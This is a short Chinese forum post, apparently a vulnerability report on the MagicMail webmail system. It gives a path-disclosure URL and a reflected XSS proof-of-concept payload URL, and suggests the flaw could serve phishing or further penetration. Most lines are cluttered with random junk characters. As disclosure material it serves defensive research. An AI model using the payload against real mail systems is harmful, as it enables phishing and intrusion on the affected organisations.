今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
' z% J3 U; t) \# g" i
" A4 T" F0 c, _: b& S8 @ % X$ @! q# L, T7 h* a
包含 一个反射性XSS 以及 绝对路径泄漏( p! s6 {' J' W% w5 y
看了看 貌似全部是linux的。' J$ t( q# ?! \+ F" |1 c
$ U( ^, \! j0 \1 D9 a3 K* K
关键字:迈捷邮件系统 by MagicMail
* Z8 {! u" l, t3 d3 b g/ }9 n$ S# Q' M* J& C
可以看到很多政府网站都用这个邮件系统7 w( u$ o) z3 w4 R+ p( D
]2 X4 J0 C% E# X: M: ^# o
绝对路径 http://madman.in/index.php?login_type=declare&language=& V/ ^9 P/ O- |
& S8 K8 Y7 G+ L1 g0 e0 C1 D2 j @# p0 `
7 i: x# U0 X! q- u# q
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E4 _( v, N) }' ?- e/ K7 a
# L8 [! L( `2 s" V: A
6 n5 V% W L7 R$ o' ?9 L. U
. @4 K' s! g5 h/ Q6 @/ @ D8 F9 J# v虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
8 Y" j1 A, I% O$ x
, D/ _( a+ ?# E修复方案:看官方补丁吧。
' }3 S. B/ {5 ?/ f |